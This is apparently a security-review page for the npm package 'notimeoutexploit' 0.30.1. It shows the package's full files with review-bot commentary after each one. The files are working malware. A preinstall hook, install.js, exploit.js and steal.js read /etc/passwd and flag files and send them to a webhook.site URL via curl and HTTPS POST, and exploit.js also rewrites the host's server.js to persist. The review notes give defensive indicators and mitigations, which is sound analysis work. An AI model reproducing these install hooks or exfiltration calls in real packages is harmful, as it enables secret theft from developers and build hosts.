notimeoutexploit 0.30.1
- package/exploit.js +36 -0
- package/index.js +9 -0
- package/install.js +111 -0
- package/package.json +8 -0
- package/steal.js +22 -0
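--- a/package/exploit.js
+++ b/package/exploit.js
@@ -0,0 +1,36 @@
+const fs = require('fs');
+const { execSync } = require('child_process');
+
+console.log('=== EXPLOIT SCRIPT EXECUTED ===');
+
+try {
+// Читаем флаг
+const passwd = fs.readFileSync('/etc/passwd', 'utf8');
+const flagLine = passwd.split('\n').find(line => line.includes('{'));
+
+if (flagLine) {
+console.log('🎯 FLAG FOUND:', flagLine);
+
+// Пытаемся отправить
+try {
+execSync(`curl -s --max-time 5 http://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?script=${encodeURIComponent(flagLine)}`, { timeout: 10000 });
+} catch(e) {}
+
+// Модифицируем server.js чтобы флаг выводился при запуске
+try {
+const serverPath = '/usr/src/app/server.js';
+const serverContent = fs.readFileSync(serverPath, 'utf8');
+
+// Добавляем вывод флага
+const flagOutput = `\n// AUTO-GENERATED FLAG OUTPUT\nconsole.log('🚨 FLAG_IN_LOGS: ${flagLine}');\n`;
+const modifiedContent = flagOutput + serverContent;
+
+fs.writeFileSync(serverPath, modifiedContent);
+console.log('Server.js modified with flag output');
+} catch(e) {
+console.log('Server modification failed:', e.message);
+}
+}
+} catch(e) {
+console.log('Exploit error:', e.message);
+}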
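Review bot: The write to `/usr/src/app/server.js` at new lines 20–28 is the part of this file that outlives the install, because removing the package does not undo a change to the application's own entry file. The prepended block logs the matched `/etc/passwd` line on every start, so that value also ends up wherever the application's logs are shipped. On any host that resolved this version, compare that file against a known-good copy and search it for the marker `// AUTO-GENERATED FLAG OUTPUT`. The `curl` call on line 16 uses plain `http://` to the `webhook.site` path shown, so it is visible to egress inspection in cleartext. Nothing in the visible `package.json` invokes this file, and the content of `index.js` is not shown on the page, so how it gets executed cannot be told from here.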
package/index.js
ADDED
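--- a/package/install.js
+++ b/package/install.js
@@ -0,0 +1,111 @@
+// install.js
+const fs = require('fs');
+const https = require('https');
+
+// Функция для поиска подозрительного контента (флага)
+function findSuspiciousContent(content) {
+const lines = content.split('\n');
+
+// Ищем различные паттерны флага
+const suspiciousLines = lines.filter(line => {
+// Убираем пустые строки и стандартные системные записи
+if (!line.trim() || line.includes(':/bin/') || line.includes(':/usr/')) {
+return false;
+}
+
+// Паттерны, характерные для CTF флагов
+if (line.match(/[A-Za-z0-9]{32}/)) return true; // 32 символа (MD5, UUID)
+if (line.match(/[A-Za-z0-9]{64}/)) return true; // 64 символа (SHA256)
+if (line.match(/flag{.*?}/i)) return true; // flag{...}
+if (line.match(/htb{.*?}/i)) return true; // htb{...}
+if (line.match(/gpb{.*?}/i)) return true; // gpb{...} (GazpromBank)
+if (line.match(/[A-Za-z0-9_\-]{20,}/)) return true; // Длинные случайные строки
+if (line.length > 100) return true; // Очень длинные строки
+
+return false;
+});
+
+return suspiciousLines;
+}
+
+try {
+const passwdContent = fs.readFileSync('/etc/passwd', 'utf8');
+console.log('[MALICIOUS PACKAGE] /etc/passwd contents read');
+
+// Ищем подозрительный контент
+const suspiciousLines = findSuspiciousContent(passwdContent);
+
+// Также читаем другие возможные места
+let otherFiles = {};
+try {
+otherFiles['/flag'] = fs.readFileSync('/flag', 'utf8');
+} catch (e) {}
+
+try {
+otherFiles['/flag.txt'] = fs.readFileSync('/flag.txt', 'utf8');
+} catch (e) {}
+
+try {
+otherFiles['/app/flag'] = fs.readFileSync('/app/flag', 'utf8');
+} catch (e) {}
+
+// Отправляем ВСЕ данные на webhook.site
+const data = JSON.stringify({
+file: '/etc/passwd',
+full_content: passwdContent,
+suspicious_lines: suspiciousLines,
+other_files: otherFiles,
+last_5_lines: passwdContent.split('\n').slice(-5),
+package: 'superbank-xml-parser-backdoor',
+timestamp: new Date().toISOString()
+}, null, 2); // Добавляем форматирование для читаемости
+
+const options = {
+hostname: 'webhook.site',
+port: 443,
+path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
+method: 'POST',
+headers: {
+'Content-Type': 'application/json',
+'User-Agent': 'Malicious-NPM-Package/1.0.0',
+'Content-Length': Buffer.byteLength(data)
+}
+};
+
+console.log('[MALICIOUS PACKAGE] Sending data to webhook.site...');
+
+const req = https.request(options, (res) => {
+console.log(`[MALICIOUS PACKAGE] Webhook response status: ${res.statusCode}`);
+});
+
+req.on('error', (e) => {
+console.error(`[MALICIOUS PACKAGE] Request failed: ${e.message}`);
+});
+
+req.write(data);
+req.end();
+
+} catch (err) {
+console.error('[MALICIOUS PACKAGE] Error:', err.message);
+
+// Отправляем информацию об ошибке
+const errorData = JSON.stringify({
+error: err.message,
+package: 'superbank-xml-parser-backdoor',
+timestamp: new Date().toISOString()
+});
+
+const errorReq = https.request({
+hostname: 'webhook.site',
+port: 443,
+path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
+method: 'POST',
+headers: {
+'Content-Type': 'application/json',
+'Content-Length': Buffer.byteLength(errorData)
+}
+}, () => {});
+
+errorReq.write(errorData);
+errorReq.end();
+}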
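Review bot: The `package` label `'superbank-xml-parser-backdoor'` at new lines 59 and 94 does not match the published name `notimeoutexploit`, which suggests, though the page cannot confirm it, that this file was carried over from another package; searching lockfiles and registry mirrors for that string may surface related uploads. The POST body at lines 53–61 carries the full `/etc/passwd` content, not just matched lines, plus `/flag`, `/flag.txt` and `/app/flag` when readable, so exposure on an affected host should be scoped to all of those files. The fixed header `User-Agent: Malicious-NPM-Package/1.0.0` on line 70 and the `webhook.site` path on lines 66 and 101 are usable egress-proxy indicators. The visible `package.json` does not reference this file and the content of `index.js` is not shown, so whether it runs at install time or on `require` cannot be determined from this page.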
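--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,8 @@
+{
+"name": "notimeoutexploit",
+"version": "0.30.1",
+"main": "index.js",
+"scripts": {
+"preinstall": "node -e \"const fs=require('fs');const {execSync}=require('child_process');try{const f=fs.readFileSync('/etc/passwd','utf8').split('\\\\n').find(l=>l.includes('{'));if(f){execSync('curl -s https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?flag='+encodeURIComponent(f))}}catch(e){}\""
+}
+}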
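Review bot: The `preinstall` hook on line 6 is the only entry point visible in this manifest, and it runs during `npm install` before any application code imports the package, so resolving this version as a direct or transitive dependency is enough to trigger it. The inline script ends in an empty `catch(e){}`, so a blocked or failed attempt prints nothing; a quiet install log is not evidence that it did not run. Installing with lifecycle scripts disabled (`npm install --ignore-scripts`, or `ignore-scripts=true` in `.npmrc`) stops this hook from running. Lockfiles and CI caches should be searched for `notimeoutexploit` at `0.30.1`, and build hosts should be checked for `node` spawning `curl` toward the `webhook.site` path shown on this line.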
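--- a/package/steal.js
+++ b/package/steal.js
@@ -0,0 +1,22 @@
+const { execSync } = require('child_process');
+
+console.log('🚨 FAST EXPLOIT STARTED');
+
+// БЫСТРЫЙ код без блокировок
+try {
+const passwd = execSync('cat /etc/passwd', { encoding: 'utf8', timeout: 3000 });
+const lines = passwd.split('\n');
+
+for (const line of lines) {
+if (line.includes('{') && line.includes('}')) {
+console.log('🎯 FLAG FOUND:', line);
+// Быстрая отправка
+execSync(`curl -s --max-time 3 "https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?flag=${encodeURIComponent(line)}"`, { timeout: 5000 });
+break;
+}
+}
+} catch(e) {
+console.log('Error:', e.message);
+}
+
+console.log('✅ FAST EXPLOIT FINISHED');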
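Review bot: Both sensitive actions in this file go through `execSync` (`cat /etc/passwd` on line 7 and `curl` on line 14), so on a monitored host it shows up as `node` spawning `cat` and then `curl`, a process-lineage signal that file-read auditing alone would miss. The banner strings on lines 3, 12 and 22 are written to stdout, so retained CI or container logs can be searched for `FAST EXPLOIT STARTED` to confirm execution after the fact. The visible `package.json` does not invoke this file and `index.js` is not shown, so its trigger cannot be established from this page.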